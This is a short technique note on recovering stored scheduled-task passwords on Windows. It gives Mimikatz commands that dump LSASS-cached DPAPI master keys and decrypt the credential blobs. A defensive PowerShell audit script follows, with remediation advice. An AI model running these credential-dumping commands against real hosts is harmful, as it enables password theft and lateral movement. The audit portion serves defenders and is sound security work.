Requirements
- Local admin
- Existing stored scheduled task credentials
Scheduled tasks may store the credentials of another user so that a task can run as that user without that user logging on. These stored credentials are kept in C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials as blobs encrypted with DPAPI, which is why the corresponding DPAPI master key is needed to read them.
To obtain the stored credentials:
- Use Mimikatz to identify the master key that encrypts the credential blob (this step reports the master key's GUID, not the key itself):
mimikatz dpapi::cred /in:c:\path\to\cred
- Use
mimikatz !sekurlsa::dpapi
to dump the decrypted master keys cached by LSASS.
- Decrypt the credential with the matching master key:
mimikatz dpapi::cred /in:c:\path\to\cred /masterkey:[master-key-hex]
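The following audit script is an added example and is not part of the original note. It lists the scheduled tasks on a host whose principal stores a password (logon type Password or InteractiveOrPassword), which are exactly the tasks whose DPAPI-protected blobs sit in the credential store named above, and lists those blob files so an administrator can see what a local admin could recover. It assumes Windows 8 / Server 2012 or later (the ScheduledTasks module), an elevated prompt, and the task and account names in the remediation comment are placeholders.

```powershell
# Added example, not the original note's code: audit which scheduled tasks on
# this host run under a stored password. Run from an elevated prompt on
# Windows 8 / Server 2012 or later (ScheduledTasks module required).

# Credential store named in the note above; the blob files there are hidden.
$CredStore = 'C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials'

function Get-StoredCredentialTask {
    # A task whose principal logon type is Password (or InteractiveOrPassword)
    # keeps the account's password in the Task Scheduler credential store.
    # S4U, ServiceAccount and Interactive principals do not store a password.
    Get-ScheduledTask | Where-Object {
        $_.Principal.LogonType -in @('Password', 'InteractiveOrPassword')
    } | ForEach-Object {
        [pscustomobject]@{
            TaskPath  = $_.TaskPath
            TaskName  = $_.TaskName
            RunAs     = $_.Principal.UserId
            LogonType = $_.Principal.LogonType
            State     = $_.State
        }
    }
}

function Get-CredentialBlob {
    # List the DPAPI-encrypted blobs that the tasks above resolve to.
    # -Force is needed because the files are hidden.
    if (Test-Path -Path $CredStore) {
        Get-ChildItem -Path $CredStore -Force -File |
            Select-Object Name, Length, LastWriteTime
    }
}

$tasks = Get-StoredCredentialTask
if ($tasks) {
    Write-Host "Tasks running under a stored password:"
    $tasks | Format-Table -AutoSize
} else {
    Write-Host "No scheduled tasks store a password on this host."
}

Write-Host "Credential blobs in the system profile store:"
Get-CredentialBlob | Format-Table -AutoSize

# Remediation: re-register such tasks with a principal that stores no password.
# An S4U principal works for tasks that need no network credentials; a group
# Managed Service Account (gMSA) works when network access is required.
# Placeholder names below; replace with your own task and account:
#   $p = New-ScheduledTaskPrincipal -UserId 'DOMAIN\svc_example' -LogonType S4U
#   Set-ScheduledTask -TaskName 'Example Task' -Principal $p
```

Run it on a host before and after converting tasks to S4U or gMSA principals: once no task reports a Password logon type, the credential store should no longer hold a blob that the Mimikatz steps above could decrypt into a reusable password.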